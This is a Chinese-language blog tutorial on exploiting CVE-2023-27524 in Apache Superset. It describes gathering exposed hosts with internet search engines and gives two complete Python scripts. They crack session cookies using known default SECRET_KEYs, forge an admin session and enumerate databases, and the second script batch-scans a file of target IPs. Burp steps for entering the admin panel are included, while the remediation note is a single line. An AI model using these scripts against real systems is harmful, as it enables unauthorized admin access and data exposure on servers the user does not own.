实战-ApacheSuperset未授权访问漏洞(CVE-2023-27524)

声明:

该文章仅供网络安全领域的学习使用,请勿利用文章内的相关技术从事任何非法行为。

测试资产为国外 IP,存在漏洞的 IP 地址已做打码处理。

我们只进行 poc,请勿进行任何非法入侵和攻击。

知攻善防,遇强则强。

开发和安全缺一不可!

目录

目录

一、Apache Superset 简介 

二、CVE-2023-27524 漏洞介绍

三、影响范围

四、漏洞实战

1、资产收集

2、漏洞检测

3、漏洞利用

五、总结修复

六、批量扫描


一、Apache Superset 简介 

Apache Superset 是一个开源的现代数据探索和可视化平台

二、CVE-2023-27524 漏洞介绍

 Apache Superset 是一种广泛使用的数据可视化和探索开源工具,已被确定存在潜在的安全漏洞,可能导致身份验证绕过和远程代码执行 (RCE),这些漏洞可能使恶意行为者能够获得目标服务器上的管理权限,从而使他们能够收集用户凭据并可能危及数据。

三、影响范围

Apache Superset 2.0.1 及之前的版本

四、漏洞实战

1、资产收集

使用黑暗搜索引擎(fofa、zoomeye、鹰图等)

Apache Superset

导出资产数据,我们只使用它的IP即可

2、漏洞检测

检测脚本python源码:

from flask_unsign import session
import requests
import urllib3
import argparse
import re
from time import sleep
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


SECRET_KEYS = [
    b'x02x01thisismyscretkeyx01x02\e\y\y\h',  # version < 1.4.1
    b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET',          # version >= 1.4.1
    b'thisISaSECRET_1234',                            # deployment template
    b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY',          # documentation
    b'TEST_NON_DEV_SECRET'                            # docker compose
]

def main():

    parser = argparse.ArgumentParser()
    parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True)
    parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1')
    parser.add_argument('--validate', '-v', help='Validate login', required=False, action='store_true')
    parser.add_argument('--timeout', '-t', help='Time to wait before using forged session cookie, default=5s', required=False, type=int, default=5)
    args = parser.parse_args()

    try:
        u = args.url.rstrip('/') + '/login/'

        headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0'
        }

        resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False)
        if resp.status_code != 200:
            print(f'Error retrieving login page at {u}, status code: {resp.status_code}')
            return

        session_cookie = None
        for c in resp.cookies:
            if c.name == 'session':
                session_cookie = c.value
                break

        if not session_cookie:
            print('Error: No session cookie found')
            return

        print(f'Got session cookie: {session_cookie}')

        try:
            decoded = session.decode(session_cookie)
            print(f'Decoded session cookie: {decoded}')
        except:
            print('Error: Not a Flask session cookie')
            return

        match = re.search(r'&#34;version_string&#34;: &#34;(.*?)&#34', resp.text)
        if match:
            version = match.group(1)
        else:
            version = 'Unknown'

        print(f'Superset Version: {version}')

            
        for i, k in enumerate(SECRET_KEYS):
            cracked = session.verify(session_cookie, k)
            if cracked:
                break

        if not cracked:
            print('Failed to crack session cookie')
            return

        print(f'Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: {k}')

        try:
            user_id = int(args.id)
        except:
            user_id = args.id
        
        forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k)
        print(f'Forged session cookie for user {user_id}: {forged_cookie}')

        if args.validate:
            validated = False
            try:
                headers['Cookie'] = f'session={forged_cookie}'
                print(f'Sleeping {args.timeout} seconds before using forged cookie to account for time drift...')
                sleep(args.timeout)
                resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False)
                if resp.status_code == 302:
                    print(f'Got 302 on login, forged cookie appears to have been accepted')
                    validated = True
                else:
                    print(f'Got status code {resp.status_code} on login instead of expected redirect 302. Forged cookie does not appear to be valid. Re-check user id.')
            except Exception as e_inner:
                print(f'Got error {e_inner} on login instead of expected redirect 302. Forged cookie does not appear to be valid. Re-check user id.')

            if not validated:
                return

            print('Enumerating databases')
            for i in range(1, 101):
                database_url_base = args.url.rstrip('/') + '/api/v1/database'
                try:
                    r = requests.get(f'{database_url_base}/{i}', headers=headers, verify=False, timeout=30, allow_redirects=False)
                    if r.status_code == 200:
                        result = r.json()['result'] # validate response is JSON
                        name = result['database_name']
                        print(f'Found database {name}')
                    elif r.status_code == 404:
                        print(f'Done enumerating databases')
                        break # no more databases
                    else:
                        print(f'Unexpected error: status code={r.status_code}')
                        break
                except Exception as e_inner:
                    print(f'Unexpected error: {e_inner}')
                    break


    except Exception as e:
        print(f'Unexpected error: {e}')


if __name__ == '__main__':
    main()

用法:

在脚本位置打开 cmd,使用 python 命令执行该脚本,使用 -u 参数指定测试的 url

(注意:url 需要加上 http:// 或者对应端口)

对于存在该漏洞的网站,我们就会得到一个cookie

3、漏洞利用

针对同一个 URL ,每次执行得到的 cookie 值是不一样、随机的

比如我们现在得到了一个 cookie 值

cookie:session=eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZantOw.o2wwp8nNjVZKBCDr2fyoki_k9OY

然后我们去访问

http://存在漏洞的主机IP/login/

使用 burpsuite 抓包拦截,将 cookie 添加进去

然后放包,并且关掉 burpsuite 的拦截

查看页面回显,直接进入到 Apache Superset 的管理后台

查看它的信息

不要发到重发器,我们直接抓包后修改 cookie 放包即可,这里要的就是302重定向。

五、总结修复

安装官方发布的升级修复补丁

六、批量扫描

对原有脚本进行一定修改

用法及说明:

使用 -f 参数指定一个 txt 文档,里面为所有的目标 IP

同样 -v 参数可以验证登录,枚举数据库信息

-t 参数指定进入等待时间

每条扫描结果间使用分隔符隔开

每条结果前会显示对应请求的 URL

去掉了原有的 -u 和 --id 参数

自动为扫描结果分配 id

附上修改后的脚本:

from flask_unsign import session
import requests
import urllib3
import argparse
import re
from time import sleep
import os

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

SECRET_KEYS = [
    b'x02x01thisismyscretkeyx01x02\e\y\y\h',  # version < 1.4.1
    b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET',          # version >= 1.4.1
    b'thisISaSECRET_1234',                            # deployment template
    b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY',          # documentation
    b'TEST_NON_DEV_SECRET'                            # docker compose
]

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('--file', '-f', help='包含 IP 列表的文本文件的路径', required=True)
    parser.add_argument('--validate', '-v', help='验证登录', required=False, action='store_true')
    parser.add_argument('--timeout', '-t', help='在使用伪造的会话 cookie 之前等待的时间,默认为 5 秒', required=False, type=int, default=5)
    args = parser.parse_args()

    try:
        with open(args.file, 'r') as file:
            ip_list = file.read().splitlines()

        for i, ip in enumerate(ip_list, start=1):
            args.url = f'http://{ip}'
            process_ip(args, ip, i)
            print('-' * 150)  # 添加的分隔符
    except Exception as e:
        print(f'发生意外错误:{e}')

def process_ip(args, ip, user_id):
    try:
        u = args.url.rstrip('/') + '/login/'

        headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0'
        }

        resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False)
        if resp.status_code != 200:
            print(f'在 {u} 处获取登录页面时发生错误,状态码:{resp.status_code}')
            return

        session_cookie = None
        for c in resp.cookies:
            if c.name == 'session':
                session_cookie = c.value
                break

        if not session_cookie:
            print(f'对 {ip} 的错误:未找到会话 cookie')
            return

        print(f'{u} 获取到会话 cookie:{session_cookie}')

        try:
            decoded = session.decode(session_cookie)
            print(f'{u} 解码后的会话 cookie:{decoded}')
        except:
            print(f'{u} 错误:不是 Flask 会话 cookie')
            return

        match = re.search(r'&#34;version_string&#34;: &#34;(.*?)&#34', resp.text)
        if match:
            version = match.group(1)
        else:
            version = '未知'

        print(f'{u} Superset 版本:{version}')

        for i, k in enumerate(SECRET_KEYS):
            cracked = session.verify(session_cookie, k)
            if cracked:
                break

        if not cracked:
            print(f'{u} 无法破解会话 cookie')
            return

        print(f'{u} 对 CVE-2023-27524 漏洞的敏感 - 使用默认的 SECRET_KEY:{k}')

        forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k)
        print(f'{u} 为用户 {user_id} 伪造的会话 cookie:{forged_cookie}')

        if args.validate:
            validated = False
            try:
                headers['Cookie'] = f'session={forged_cookie}'
                print(f'{u} 在使用伪造的 cookie 之前等待 {args.timeout} 秒以考虑时间漂移...')
                sleep(args.timeout)
                resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False)
                if resp.status_code == 302:
                    print(f'{u} 在登录时得到 302,伪造的 cookie 似乎已被接受')
                    validated = True
                else:
                    print(f'{u} 在登录时得到状态码 {resp.status_code},而不是预期的重定向 302。伪造的 cookie 似乎无效。请重新检查用户 ID。')
            except Exception as e_inner:
                print(f'{u} 在登录时发生错误 {e_inner},而不是预期的重定向 302。伪造的 cookie 似乎无效。请重新检查用户 ID。')

            if not validated:
                return

            print(f'{u} 正在枚举数据库')
            for i in range(1, 101):
                database_url_base = args.url.rstrip('/') + f'/api/v1/database'
                try:
                    r = requests.get(f'{database_url_base}/{i}', headers=headers, verify=False, timeout=30, allow_redirects=False)
                    if r.status_code == 200:
                        result = r.json()['result']  # 验证响应是否为 JSON
                        name = result['database_name']
                        print(f'{u} 找到数据库 {name}')
                    elif r.status_code == 404:
                        print(f'{u} 完成枚举数据库')
                        break  # 没有更多的数据库
                    else:
                        print(f'{u} 意外错误:状态码={r.status_code}')
                        break
                except Exception as e_inner:
                    print(f'{u} 意外错误:{e_inner}')
                    break

    except Exception as e:
        print(f'{u} 意外错误:{e}')

if __name__ == '__main__':
    main()